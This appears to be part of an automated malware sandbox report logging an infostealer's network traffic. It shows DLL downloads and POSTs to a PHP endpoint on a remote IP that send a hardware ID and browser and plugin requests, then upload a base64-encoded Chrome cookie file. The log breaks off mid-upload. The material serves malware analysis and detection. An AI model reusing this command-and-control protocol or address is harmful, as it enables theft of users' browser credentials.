00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:35 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "6dde8-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:37 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "1f3950-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:40 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "3ef50-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:42 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "13bf0-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.66.249.162Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 45.66.249.162Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 38 33 34 38 30 33 38 42 44 30 38 35 36 34 33 38 36 38 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 76 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="hwid"938348038BD0856438680------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build"v1------IDHDGDHJEGHIDGDHCGCB--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: 45.66.249.162Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="message"browsers------CBKFIECBGDHJKECAKFBG--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: 45.66.249.162Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="message"plugins------IJEGDBGDBFIJKECBAKFB--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 45.66.249.162Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="message"fplugins------CFHIIEHJKKECGCBFIIJD--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 45.66.249.162Content-Length: 5547Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/sqlite3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 45.66.249.162Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZk
